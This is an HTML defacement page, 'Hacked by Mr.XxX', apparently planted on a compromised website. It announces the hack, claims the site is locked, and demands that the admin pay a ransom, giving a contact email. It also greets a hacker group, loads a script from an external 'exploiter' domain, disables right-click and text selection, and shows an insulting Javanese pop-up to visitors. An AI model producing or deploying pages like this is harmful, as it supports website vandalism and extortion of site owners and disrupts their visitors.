<!DOCTYPE html>
<html>
<head>
 <link href="https://fonts.googleapis.com/css?family=Freckle+Face|Oxanium|Rationale&display=swap" rel="stylesheet">
  <script>var jeneng; jeneng=prompt('jenengmu sopo?'); if(jeneng){ alert('Hai,'+ jeneng +'.jenengku Mr.XxX'); }else{ alert('Bajingan sombong o kowe su');  } </script>
 <link href="https://j.top4top.io/p_1814hedl60.jpg" rel="icon" type="image/x-icon">
 <meta name="viewport" content="width=1000, user-scalable=no">
 <meta name="theme-color" content="black">
 <link rel="SHORTCUT ICON" href="https://pm1.narvii.com/6877/7aad28281b89f7ee109c72d306bba690e269d802r1-750-529v2_uhq.jpg" />
 <meta property="og:image"content="https://pm1.narvii.com/6877/7aad28281b89f7ee109c72d306bba690e269d802r1-750-529v2_uhq.jpg">
 <meta name="description" content="SUBREK CHANNEL The Dark World slurd">
 <meta name="keywords" content="#Subrek">
 <title>Hacked by Mr.XxX</title>
</head>
<script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } </script>
<script language="JavaScript">document.addEventListener("contextmenu", function(e){ e.preventDefault();}, false);</script>
<style type="text/css">
 body{
 background-image: url('https://c.top4top.io/p_1831gj6fu0.gif');
 background-size: cover;
 display:block;
 -khtml-user-select:none;
 -webkit-user-select:none;
 -moz-user-select:none;
 -ms-user-select:none;
 -o-user-select:none;
 user-select:none;
 unselectable:on;
 }
 .lagu{
 background-color: white;
 margin-bottom: 3px;
 border-radius: 13px;
 border:black double;
 font-family: Oxanium;
 color: white; size: 15px;
 }
 .dj {
 -webkit-animation-name: blinker;
 -webkit-animation-duration: 1s;
 -webkit-animation-timing-function: linear;
 -webkit-animation-iteration-count: infinite;
 -moz-animation-name: blinker;
 -moz-animation-duration: 24s;
 -moz-animation-timing-function: linear;
 -moz-animation-iteration-count: infinite;
 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;
 color: red;
 }
 @-moz-keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 @-webkit-keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 @keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 .dj2 {
 -webkit-animation-name: blinker;
 -webkit-animation-duration: 1s;
 -webkit-animation-timing-function: linear;
 -webkit-animation-iteration-count: infinite;
 -moz-animation-name: blinker;
 -moz-animation-duration: 2s;
 -moz-animation-timing-function: linear;
 -moz-animation-iteration-count: infinite;
 animation-name: blinker;
 animation-duration: 2s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;
 color: red;
 }
 @-moz-keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 @-webkit-keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 @keyframes blinker { 0% { opacity: 5.0; } 50% { opacity: 0.0; } 100% { opacity: 5.0; } }
 .lagu:hover{
 background-color: transparent;
 color: white;
 border:red double;
 font-size:30px;
 }
 .dalam{
 background-color: transparent;
 border: red double;
 }
 .inifont{
 color: #FF0000 ;
 font-size:67px;
 font-family: Freckle Face;
 }
</style>
<script src="http://gresixploiter.ga/tools/salju2.js" type="text/javascript"></script>
<body>
 <center>
<br><hr>
 <h4 style="margin-top: 1px;margin-bottom: 0px; font-size:63px;color:#FF0000 ; outline-color: 4px white; font-family:Freckle Face;">[&#9760] Hacked By Mr.XxX [&#9760]</h4>
<hr><br>
 <img src="https://k.top4top.io/p_1840uo7850.png" height="650" width="700">
 <br><br>
 <div id="clock" style="color: #696969; font-family: Freckle Face; font-size: 74px;"></div>
 <script type="text/javascript">
 <!-- function showTime() { var a_p = ""; var today = new Date(); var curr_hour = today.getHours(); var curr_minute = today.getMinutes(); var curr_second = today.getSeconds(); if (curr_hour < 24) { a_p = ""; } else { a_p = ""; } if (curr_hour == 0) { curr_hour = 24; } if (curr_hour > 24) { curr_hour = curr_hour - 24; } curr_hour = checkTime(curr_hour); curr_minute = checkTime(curr_minute); curr_second = checkTime(curr_second); document.getElementById('clock').innerHTML=curr_hour + " : " + curr_minute + " : " + curr_second + " " + a_p; } function checkTime(i) { if (i < 10) { i = "0" + i; } return i; } setInterval(showTime, 500); //--> </script>
 <br><hr><hr><br>
 <font face="Rationale" size="7" color="#FF0000">[ FREEDOM FOR ALL,THANKS ADMIN ]</font><br>
 <font face="Rationale" size="7" color="#FFFFFF"> Sorry Admin,your website is locked by me:).i will restore your website but before that you have to pay the ransom to me</font>
 <br><a href='https://security-xploit7.blogspot.com'> <img alt='Blogger' src='https://cdn0.iconfinder.com/data/icons/social-networks-and-media-flat-icons/136/Social_Media_Socialmedia_network_share_socialnetwork_network-22-512.png' width='40' height='40'></a><a href='https://www.youtube.com/channel/UCE56kwJEuHbNd3xHbTarmAw'> <img alt='Youtube' src='https://www.upload.ee/image/11226706/images__5_-removebg-preview.png' width='40' height='40'></a>
 <br><font face="Rationale" size="7" color="red"> [ </font><font face="Rationale" size="7" color="white">contact me at anonimishere38@gmail.com</font> <font face="Rationale" size="7" color="red"> ] </font>
 <br><br><hr><hr><br></center>
 <center>
 <button class="lagu" onclick="play();liat();"><font face="Oxanium" size="6" color="red" >&laquo; Music &raquo;</font></button><audio id="lagu" src="https://k.top4top.io/m_18250mtep0.mp3"></audio><br><br><br>
<font face="Rationale" color="red" size="7">| Greetz us=[<marquee width="70%"><font face="Rationale" color="white" size="6">Zxce3-Matakocheng-Xmondardo-Cad3l and All member Javablackhat haxor</font></marquee>
 </center>
</body>
</html>
